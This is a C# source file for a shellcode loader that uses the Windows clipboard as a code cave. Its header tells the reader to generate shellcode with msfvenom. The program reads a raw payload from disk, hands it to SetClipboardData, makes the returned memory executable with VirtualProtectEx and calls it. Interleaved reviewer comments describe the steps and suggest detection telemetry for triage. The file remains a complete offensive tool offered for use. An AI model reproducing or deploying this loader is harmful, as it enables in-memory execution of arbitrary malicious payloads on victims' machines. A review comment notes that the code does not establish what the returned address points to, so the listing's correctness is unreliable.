// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
//
// Reviewer notes (what the listing does, read from a detection/triage point of view):
//   1. Reads a raw binary blob from a hard-coded path on disk.
//   2. Pins the managed byte[] and passes its address to SetClipboardData.
//   3. Changes the protection of the value returned by SetClipboardData to
//      executable-read inside the current process.
//   4. Calls that address through a managed delegate.
// Telemetry worth correlating: csc.exe run outside a build pipeline to produce the
// binary, then a managed process that uses clipboard APIs with no owner window and
// right afterwards makes a data region in its own address space executable and
// runs from it (execution from memory not backed by a loaded image).
using System;
using System.IO;
using System.Runtime.InteropServices;

namespace ClippySCInject
{
    class Program
    {
        // Parameterless unmanaged entry point returning a pointer-sized value;
        // used to invoke the address obtained in Main.
        private delegate IntPtr test();

        // Entry point. args is not used. No return value of OpenClipboard,
        // SetClipboardData or CloseClipboard is inspected, and the pinned
        // GCHandle is never freed within this file.
        static void Main(string[] args)
        {
            // Payload bytes come straight from a file; the path is a placeholder in this listing.
            byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");

            // IntPtr.Zero: the clipboard is opened without associating it with a window.
            OpenClipboard(IntPtr.Zero);

            // Pin the array so the GC cannot move it while its raw address is handed to native code.
            GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned);
            IntPtr payloadpointer = payloadArray.AddrOfPinnedObject();

            // Format 2 is CF_BITMAP in winuser.h; the API documents hMem as a handle to data
            // in that format, while here it receives the address of the pinned byte[].
            // NOTE(review): the return value is treated below as an address to re-protect and
            // call; this file does not establish what it points to - confirm before relying on it.
            IntPtr scData = SetClipboardData(2, payloadpointer);
            CloseClipboard();

            uint oldProtect = 0; //Old protect is RW by default

            // 0x20 is PAGE_EXECUTE_READ. GetCurrentProcess() targets this process itself, so this
            // is an in-process protection change over payload.Length bytes starting at scData.
            // The branch below only runs when the call reports success.
            if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect))
            {
                // Wrap the raw address in the delegate type declared above and call it.
                test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
                executesc();
            }
        }

        // P/Invoke declarations. The user32 imports set SetLastError; the VirtualProtectEx
        // import does not, so Marshal.GetLastWin32Error is not reliable after that call.

        // user32!OpenClipboard
        [DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)]
        private static extern bool OpenClipboard(IntPtr hWndNewOwner);

        // user32!SetClipboardData
        [DllImport("User32.dll", SetLastError = true)]
        static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);

        // user32!CloseClipboard
        [DllImport("user32.dll", SetLastError = true)]
        static extern bool CloseClipboard();

        // kernel32!VirtualProtectEx; lpflOldProtect receives the previous protection value.
        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        // kernel32!GetCurrentProcess; declared public, unlike the other imports in this class.
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetCurrentProcess();
    }
}